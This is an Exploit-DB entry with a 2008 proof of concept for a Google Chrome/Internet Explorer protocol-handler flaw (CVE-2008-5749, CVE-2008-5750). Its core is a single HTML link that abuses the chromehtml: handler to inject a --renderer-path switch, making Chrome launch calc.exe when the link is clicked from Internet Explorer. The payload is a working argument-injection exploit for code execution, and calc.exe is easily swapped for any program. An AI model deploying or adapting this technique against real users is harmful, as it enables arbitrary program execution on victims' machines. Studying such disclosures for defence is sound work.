Google Chrome Browser ChromeHTML:// Remote Parameter Injection

2008-12-23T00:00:00
ID EDB-ID:7566
Type exploitdb
Reporter Nine:Situations:Group
Modified 2008-12-23T00:00:00

Description

Google Chrome Browser (ChromeHTML://) Remote Parameter Injection. CVE-2008-5749,CVE-2008-5750. Remote exploit for windows platform

                                        
                                            <!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

# milw0rm.com [2008-12-23]